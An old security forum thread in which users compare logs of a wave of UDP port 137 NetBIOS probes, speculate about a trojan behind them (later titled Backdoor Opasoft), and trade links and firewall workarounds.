new trojan known for UDP 137: Backdoor Opasoft

Hi dear forum fellows, just wondering, as i get a remarkable high amount of UDP 137 knocks 99% of Korean origin (most of time originating from their port 1025) since yesterday but today it's really many, i wonder if something known is going on? ShieldsUp told me i'm stealth but ....

With this i wonder if more people name their computer
{not available} for their protection against resolving

subject line changed - Forum Admin

 

Re:Any new trojan known for UDP 137?

See this dynamic report page
http://isc.incidents.org/port_details.html?port=137

 

Re:Any new trojan known for UDP 137?

It is possible this is a trojan - or some sort of coordinated attack by some hacking group against various IP ranges (since, as you said, it seems to be coming mostly from Korea...).

Or it could be a hacker trying out "their" compromised machines to try to find more machines to compromise...who knows.

If i find any more information on new trojans, viruses, etc that use this port, you can be sure I will post it.

-Javacool

 

Re:Any new trojan known for UDP 137?

If you look at the page now you see it has passed 8% of the reports, with over 108,000 records and this is 2% more already then the big attack on 14 September.
Found older reports also exactly servers probed on UDP 137 to take over with 1025-1026; shared files and trying to install backdoor and destroying stuff.
I found out the moment i open TDS port listen it stops immediately till i close that and it starts again in a few moments.
During the day the attacks have moved round the globe with the sun over the whole time zones and now it's back in Korea for me.
Hmm that port listen doesn't stop the port 80 knocks now.

As UDP has not the return signal but TCP has, that's the reason why i think it might not be a bad idea to rename your own computer to {not available} in stead of whatever it is. (see the resolve info in VisualZone and you see what i mean)

Compromising or compromised already, both is possible, maybe trying to install zombies for a big DoS, maybe the Kazaa taking over or from another p2p service..... all is possible and most people don't wake up, thinking 137 is innocent but i'm sure it's not in this case.

Looking forward to your finds, as google doesn't bring me any recent news nowhere.

 

Re:Any new trojan known for UDP 137?

Hi Jooske,

I really get bombarded with those UDP NetBios Name scans.

It's no fun .........

 

Re:Any new trojan known for UDP 137?

Finally somebody is waking up, why you think i started warning many hours ago? Don't know what to do about it but being happy the firewall still seems to stop them.
Coming unorganised from everywhere now, think they're trying to DosS the whole internet.
Still don't see anything useful nowhere on info what this is about. New Kazaa? It's not peek-a-booty as that was on 443 if i remember well, so what can it be?

 

Re:Any new trojan known for UDP 137?

here is another site for posted attacks

http://www.dshield.org/

 

Re:Any new trojan known for UDP 137?

From dshield to the reports pages you come on those Storm pages i posted above.

Would like to know if other people are still getting all those knocks? And if it helped for more people with TDS to open the Port Listen on 137? Tried various times and with that on i only got the normal few port 80 probes, but no 137 anymore.
Do other people have other ways which are helpful?
The reports displays are not all updated in the plot since 28 september 22:xx GMT where almost 8% of the attacks were port 137 with over 108,000 records. So it must have grown since.

Did anybody find more info on what is going on already? whatever it was, it seems very successful for the attackers.

 

Re:Any new trojan known for UDP 137?

Jooske,

I´m not very knowledgeable in this field, but could it be they have switched to untraceable IP´s ?
I´ve been keeping an eye on my SPF logs since you started this thread and now I´ve got my first attempts all coming from what looks like home network ranges.

Regards,

Pieter

 

Re:Any new trojan known for UDP 137?

Hi all

Since I am from the old school and still believe things should be kept simple.

Here is a nicely written article written by a member of the GRC forum

Deciphering the NETSTAT -AN DOS command


http://www.geocities.com/merijn_bellekom/new/netstatan.html

 

Re:Any new trojan known for UDP 137?

Yes...and I think co ordinated with enough machines already owned to be significant.

SEE HERE
2002-09-28
Port 137 probes-anyone else?


http://www.dslreports.com/forum/remark,4556620~root=security,1~mode=flat



http://www.dslreports.com/forum/remark,4401650~root=security,1~mode=flat

 

Re:Any new trojan known for UDP 137?

Not sure, i have them from home users, universities, internet cafes, companies, networks (seeing their computers names/identifications) from all over the planet.
Not a single one from our ISP this time, so they might have put good filters up.
Maybe they track especially ZA/ZAPro users

At GRC.com the security forum is some discussion about it, but also there no more conclusions then we have here.
On the dshield reports page it is now 15% of the records today and in the yellow alarm phase, last night has grown over 200,000 records to over 10% of yesterdays submissions.

Still thinking of something like Kazaa but our ISPs security department is not sure yet.
They were really happy with my find to open in TDS the Port Listen. It's complete illogical in my opinion, as that listens to TCP ports packets and this is an UDP port, but it stops the portscans immediately.
ShieldsUp does not show that port all open with this now, so no worry!
Good time to use your panic button page for something informative today
http://home01.wxs.nl/~kleyn080/schudden.html
Is it still up?

 

Re:Any new trojan known for UDP 137?

Also.Incoming :443

http://www.dslreports.com/forum/remark,4560858~root=security,1~mode=flat

 

Re:Any new trojan known for UDP 137?

Yeah, it´s still up, but I haven´t found the time to make improvements.

I´ve got a few logs coming from port 1026 as well.

Regards,

Pieter

 

Re:Any new trojan known for UDP 137?

There are currently 4 NEW different Trojans out that take over a machine Via Kazaa infect that machine..use it as a drone then go out on various ports ie 1025 etc or go out and infect other machines so they can run a co ordinated attack.

 

Re:Any new trojan known for UDP 137?

Can you give the names of those trojans please?
It's exactly the behavior we see i guess?
I've seen in the dshield reports the most are share/ p2p ports, Kazaa, Gnutella, same like msinit/bymer; whoever did it, seems rather successful.
Are there more ways of closing the attacks then what i do withj the port listen up? not any 137 knock!

 

Re:Any new trojan known for UDP 137?

To give an idea for about one hour:


Note:
I have put xxxx at the last four digits of the IP-numbers.

 

Re:Any new trojan known for UDP 137?

Not that bad, but still..

 

Re:Any new trojan known for UDP 137?

And can you now try in TDS > Networks > TCP Port listen, fill in #137 > Listen and look once in a while at the results?
Remembering TCP has it's UDP twin most of time so this is part of logic of the result.
As i really like to read if that works for you too to stop the scans on 137.

 

Re:Any new trojan known for UDP 137?

We can allow the function to act as a server, so it would be able to communicate; in the other way it is just stopped; other people got nice log files of the 50 bytes probe packets, which seemed the normal net bios requests.
With some other tool i look at the data amount but nothing is received nor sent on those listening ports with the counter on 0. The absorbing was my first idea too, so lets wait and see what comes next!

 

Paul,

Yep, just came over to check out Jooske's thread. There are now two threads running on this at DSLR Security Forum. Look for postings by psloss, Name Game, and NetWatchMan.

 

wwx.opasoft.com resolves so nicely to 127.0.0.1 !
Would like more info, to know possible threats and damage. Imagine if my opening the TCP Port Listen all time (which really stopped the knocking) caused more that i would be aware of this moment? Dont think so, but never know till we're all sure.
But as there are several trojans with the same kind of behavior, could there be more..? thinking of the people mentioning combinations with 443 and some on 445.

 

See also here:

http://www.dslreports.com/forum/remark,4570995~root=security,1~mode=flat